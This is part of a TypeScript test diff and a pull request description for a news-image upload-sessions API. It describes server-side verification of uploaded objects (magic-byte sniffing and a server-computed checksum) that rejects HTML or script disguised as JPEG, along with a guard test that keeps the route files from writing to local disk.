     const files = listTsFiles(NEWS_PORTAL_SRC_DIR);
     expect(files.length).toBeGreaterThan(0);
 
-    const offenders: string[] = [];
+    expect(findOffenders(NEWS_PORTAL_SRC_DIR, files)).toEqual([]);
+  });
 
-    for (const file of files) {
-      const content = readFileSync(file, "utf-8");
+  test("no source file under src/pages/api/v1/media/news-images (Issue #634's upload-session routes) writes bytes to local disk or references a local-upload flag", () => {
+    const files = listTsFiles(NEWS_MEDIA_ROUTES_DIR);
+    expect(files.length).toBeGreaterThan(0);
 
-      for (const pattern of FORBIDDEN_PATTERNS) {
-        if (pattern.test(content)) {
-          offenders.push(
-            `${path.relative(NEWS_PORTAL_SRC_DIR, file)} matches ${pattern}`
-          );
-        }
-      }
-    }
-
-    expect(offenders).toEqual([]);
+    expect(findOffenders(NEWS_MEDIA_ROUTES_DIR, files)).toEqual([]);
   });
 });


### PR DESCRIPTION
## Summary

Adds the news-image upload-sessions API: `POST /api/v1/media/news-images/upload-sessions` (create pending metadata row + presigned PUT URL), `.../{id}/finalize` (verify the uploaded object before marking it verified), `.../{id}/cancel`.

**`finalize` implements the binding fix from Issue #631's Critical security-auditor finding** on this exact upload flow: it does a `HEAD` (quick existence/size check) followed by a **full `GET`** of the uploaded object, runs MIME magic-byte sniffing against the actual bytes, and computes the SHA-256 checksum **server-side** from what was actually read. A client-claimed checksum is compared only as transport-corruption detection, never as sole proof of content/MIME — closing the exact "HTML/JS disguised as `.jpg`" exploit path #631 identified. This deliberately deviates from Issue #634's own body text ("verifies... via R2 HEAD/metadata"), which predates and is superseded by the security-audited architecture doc.

R2 calls (presign/HEAD/GET) always run outside the DB transaction (ADR-0006), behind a circuit breaker + timeout, matching `sync-storage`'s existing R2 uploader pattern.

Reconciles Issue #634's suggested `media_objects.news_images.*` permission names to the `news_portal.media.*` set already established in #633 (adding a new `.cancel` permission #633 didn't anticipate).

## Test plan

- [x] `bun run check` — 1888 pass, 0 fail; lint, typecheck, docs check, `api:spec:check`, build all green.
- [x] **Exploit-scenario test**: real HTML/`<script>` bytes uploaded and claimed as `image/jpeg` — `finalize` rejects with `422 UPLOAD_VERIFICATION_FAILED` / `mime_not_recognized`, row stays `failed`, never reaches `verified`.
- [x] Other required scenarios: successful upload, ABAC deny, invalid MIME, size too large, expired session, finalize-missing-object, checksum mismatch, no-local-write structural guard (extended from #632's test).
- [x] `bun run api:spec:check` passes — new paths/schemas documented.
- [x] Changeset added.

Closes #634

🤖 Generated with [Claude Code](https://claude.com/claude-code)